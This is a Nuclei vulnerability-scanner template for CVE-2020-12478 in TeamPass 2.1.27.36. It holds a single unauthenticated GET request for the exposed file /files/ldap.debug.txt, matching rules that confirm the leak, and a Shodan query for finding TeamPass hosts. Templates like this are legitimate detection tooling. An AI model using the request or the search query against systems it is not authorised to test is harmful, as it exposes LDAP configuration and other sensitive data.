nuclei-templates/http/cves/2020/CVE-2020-12478.yaml

47 lines
1.3 KiB
YAML

id: CVE-2020-12478
info:
name: TeamPass 2.1.27.36 - Improper Authentication
author: arafatansari
severity: high
description: |
TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/nilsteampassnet/TeamPass/issues/2764
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-12478
cwe-id: CWE-306
epss-score: 0.00761
cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.html:"teampass"
verified: true
vendor: teampass
product: teampass
tags: cve,cve2020,teampass,exposure,unauth
http:
- method: GET
path:
- "{{BaseURL}}/files/ldap.debug.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Get all LDAP params'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200